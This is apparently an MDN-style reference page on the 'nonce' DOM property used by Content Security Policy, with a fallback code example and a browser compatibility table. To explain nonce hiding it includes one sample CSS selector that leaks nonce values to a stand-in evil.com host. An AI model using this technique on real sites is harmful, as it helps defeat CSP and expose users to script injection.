The nonce
property of the HTMLOrForeignElement
interface returns the cryptographic number used once that is used by Content Security Policy to determine whether a given fetch will be allowed to proceed.
In later implementations, elements only expose their nonce
attribute to scripts (and not to side-channels like CSS attribute selectors).
Examples
Retrieving a nonce value
In the past, not all browsers supported the nonce
IDL attribute, so a workaround is to try to use getAttribute
as a fallback:
let nonce = script['nonce'] || script.getAttribute('nonce');
However, recent browsers version hide nonce
values that are accessed this way (an empty string will be returned). The IDL property (script['nonce']
) will be the only way to access nonces.
Nonce hiding helps preventing that attackers exfiltrate nonce data via mechanisms that can grab data from content attributes like this:
script[nonce~=whatever] { background: url("https://evil.com/nonce?whatever"); }
Specifications
Specification |
---|
HTML Living Standard The definition of 'nonce' in that specification. |
Browser Compatibility
Desktop | Mobile | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|
nonce | Chrome Full support 61 | Edge Full support 79 | Firefox Full support 75 | IE No support No | Opera Full support Yes | Safari Full support 10 | WebView Android Full support 61 | Chrome Android Full support 61 | Firefox Android No support No | Opera Android Full support Yes | Safari iOS Full support 10 | Samsung Internet Android Full support 8.0 |
Legend
- Full support
- Full support
- No support
- No support